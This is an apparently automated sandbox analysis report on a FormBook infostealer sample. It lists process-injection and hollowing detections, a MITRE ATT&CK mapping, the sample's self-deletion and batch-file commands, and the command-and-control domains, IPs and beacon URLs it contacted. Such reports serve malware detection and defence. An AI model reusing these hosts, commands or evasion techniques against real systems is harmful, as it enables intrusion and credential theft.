          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BAF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BDF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C3B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C3B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BA40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BCA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BD002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BBB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C71074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C62073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C74015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02C27016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 19_2_02BC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\3.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.plastictohydrogen.com
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.198 80
          Source: C:\Windows\explorer.exeDomain query: www.cartercavanaugh.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.98.131.46 80
          Source: C:\Windows\explorer.exeNetwork Connect: 54.147.194.143 80
          Source: C:\Windows\explorer.exeDomain query: www.vigipharx.com
          Source: C:\Windows\explorer.exeDomain query: www.glocp9.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.ayco.sucks
          Source: C:\Windows\explorer.exeDomain query: www.mortgagenewsdailt.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\3.exeMemory written: C:\Users\user\Desktop\3.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\3.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\3.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\3.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\3.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\3.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\3.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 830000
          Source: C:\Users\user\Desktop\3.exeProcess created: C:\Users\user\Desktop\3.exe C:\Users\user\Desktop\3.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\3.exe'
          Source: explorer.exe, 00000005.00000000.256260083.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000000.281921519.0000000001980000.00000002.00000001.sdmp, ipconfig.exe, 00000013.00000002.473898302.0000000005510000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.265742554.0000000006860000.00000004.00000001.sdmp, ipconfig.exe, 00000013.00000002.473898302.0000000005510000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.281921519.0000000001980000.00000002.00000001.sdmp, ipconfig.exe, 00000013.00000002.473898302.0000000005510000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.281921519.0000000001980000.00000002.00000001.sdmp, ipconfig.exe, 00000013.00000002.473898302.0000000005510000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.303173602.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.242461084.0000000000400000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.303194189.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.302863521.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.464333846.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.465951978.0000000000740000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.465630345.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.0.3.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.3.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScripting1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Information Discovery111VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433178 Sample: 3.exe Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 37 www.studiodates.com 2->37 39 www.plaquitasparamascota.com 2->39 41 9 other IPs or domains 2->41 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 2 other signatures 2->57 11 3.exe 21 2->11         started        signatures3 process4 dnsIp5 49 cdn.discordapp.com 162.159.135.233, 443, 49716, 49717 CLOUDFLARENETUS United States 11->49 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 15 3.exe 11->15         started        18 cmd.exe 1 11->18         started        signatures6 process7 signatures8 73 Modifies the context of a thread in another process (thread injection) 15->73 75 Maps a DLL or memory area into another process 15->75 77 Sample uses process hollowing technique 15->77 79 Queues an APC in another process (thread injection) 15->79 20 explorer.exe 15->20 injected 24 cmd.exe 1 18->24         started        26 conhost.exe 18->26         started        process9 dnsIp10 43 plastictohydrogen.com 185.98.131.46, 49743, 80 RMI-FITECHFR France 20->43 45 www.mortgagenewsdailt.com 81.17.18.198, 80 PLI-ASCH Switzerland 20->45 47 7 other IPs or domains 20->47 59 System process connects to network (likely due to code injection or exploit) 20->59 61 Uses ipconfig to lookup or modify the Windows network settings 20->61 28 ipconfig.exe 20->28         started        31 conhost.exe 24->31         started        signatures11 process12 signatures13 67 Modifies the context of a thread in another process (thread injection) 28->67 69 Maps a DLL or memory area into another process 28->69 71 Tries to detect virtualization through RDTSC time measurements 28->71 33 cmd.exe 1 28->33         started        process14 process15 35 conhost.exe 33->35         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          3.exe59%VirustotalBrowse
          3.exe51%MetadefenderBrowse
          3.exe76%ReversingLabsWin32.Infostealer.BestaFera

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.1.3.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.3.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.2.3.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.ayco.sucks/ogpo/?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV00%Avira URL Cloudsafe
          http://www.cartercavanaugh.com/ogpo/?A48d=Eb/5YKKvhsVSjoe7WKqK8lvHUaW+cW6NCkYNvfPB2x3dLSCrEs0nDFeyqabSLZo4f9MA&6lR=6lV00%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.plaquitasparamascota.com/ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V&6lR=6lV00%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.glocp9.com/ogpo/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.plastictohydrogen.com/ogpo/?A48d=CbUJuKt7Vosrs6ZfvMy9ZACJtxh5Vn+1+a7oDBWZt+TgGm/ZX/AruvxTHNafm6iWRnNw&6lR=6lV00%Avira URL Cloudsafe
          http://www.amplifierconsulting.net/ogpo/?A48d=Jl6F8JfRXKQuEgspHKEQWFx9lJkkJ81RWL0viny1sd20tPIEiWVj+so6v/m+sN8GJ3v/&6lR=6lV00%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.vigipharx.com/ogpo/?A48d=/XqmpevXxgIJIxa5hFR8qIX06AkulEmPv+VC/TbkNW7S9I21kt2cK+1HkO47P92lOvxw&6lR=6lV00%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          plastictohydrogen.com
          185.98.131.46
          truetrue
            unknown
            studiodates.com
            107.180.44.132
            truetrue
              unknown
              amplifierconsulting.net
              34.102.136.180
              truefalse
                unknown
                cdn.discordapp.com
                162.159.135.233
                truefalse
                  high
                  plaquitasparamascota.com
                  34.102.136.180
                  truefalse
                    unknown
                    cartercavanaugh.com
                    34.102.136.180
                    truefalse
                      unknown
                      vigipharx.com
                      34.102.136.180
                      truefalse
                        unknown
                        indyoutlaws.com
                        192.185.11.167
                        truetrue
                          unknown
                          www.ayco.sucks
                          54.147.194.143
                          truetrue
                            unknown
                            www.mortgagenewsdailt.com
                            81.17.18.198
                            truetrue
                              unknown
                              www.nosequemierda.com
                              unknown
                              unknowntrue
                                unknown
                                www.plaquitasparamascota.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.plastictohydrogen.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.cartercavanaugh.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.catherinelazure.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.amplifierconsulting.net
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.vigipharx.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.indyoutlaws.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.glocp9.com
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.studiodates.com
                                                unknown
                                                unknowntrue
                                                  unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.ayco.sucks/ogpo/?A48d=zC0kwP5bKctHlfLOB2+sibzcGKB3iMHeqEe/jIuGwpXwhXE0RzFo/zlZKctRC22ZSehm&6lR=6lV0true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.cartercavanaugh.com/ogpo/?A48d=Eb/5YKKvhsVSjoe7WKqK8lvHUaW+cW6NCkYNvfPB2x3dLSCrEs0nDFeyqabSLZo4f9MA&6lR=6lV0false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.plaquitasparamascota.com/ogpo/?A48d=+lkBStlSiE9+OFshkPx+Yq+/zzAm/Md4bR1wj/5ry8M79budoFYJrIGh8Lqk2S+anP0V&6lR=6lV0false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  www.glocp9.com/ogpo/true
                                                  • Avira URL Cloud: safe
                                                  low
                                                  http://www.plastictohydrogen.com/ogpo/?A48d=CbUJuKt7Vosrs6ZfvMy9ZACJtxh5Vn+1+a7oDBWZt+TgGm/ZX/AruvxTHNafm6iWRnNw&6lR=6lV0true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.amplifierconsulting.net/ogpo/?A48d=Jl6F8JfRXKQuEgspHKEQWFx9lJkkJ81RWL0viny1sd20tPIEiWVj+so6v/m+sN8GJ3v/&6lR=6lV0false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.vigipharx.com/ogpo/?A48d=/XqmpevXxgIJIxa5hFR8qIX06AkulEmPv+VC/TbkNW7S9I21kt2cK+1HkO47P92lOvxw&6lR=6lV0false
                                                  • Avira URL Cloud: safe
                                                  unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.comexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.tiro.comexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.goodfont.co.krexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.carterandcone.comlexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.typography.netDexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://fontfabrik.comexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.fonts.comexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.sandoll.co.krexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.sakkal.comexplorer.exe, 00000005.00000000.270520522.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      54.147.194.143
                                                                      www.ayco.sucksUnited States
                                                                      14618AMAZON-AESUStrue
                                                                      34.102.136.180
                                                                      amplifierconsulting.netUnited States
                                                                      15169GOOGLEUSfalse
                                                                      81.17.18.198
                                                                      www.mortgagenewsdailt.comSwitzerland
                                                                      51852PLI-ASCHtrue
                                                                      162.159.135.233
                                                                      cdn.discordapp.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      185.98.131.46
                                                                      plastictohydrogen.comFrance
                                                                      16347RMI-FITECHFRtrue

                                                                      General Information

                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                      Analysis ID:433178
                                                                      Start date:11.06.2021
                                                                      Start time:12:21:20
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 10m 37s
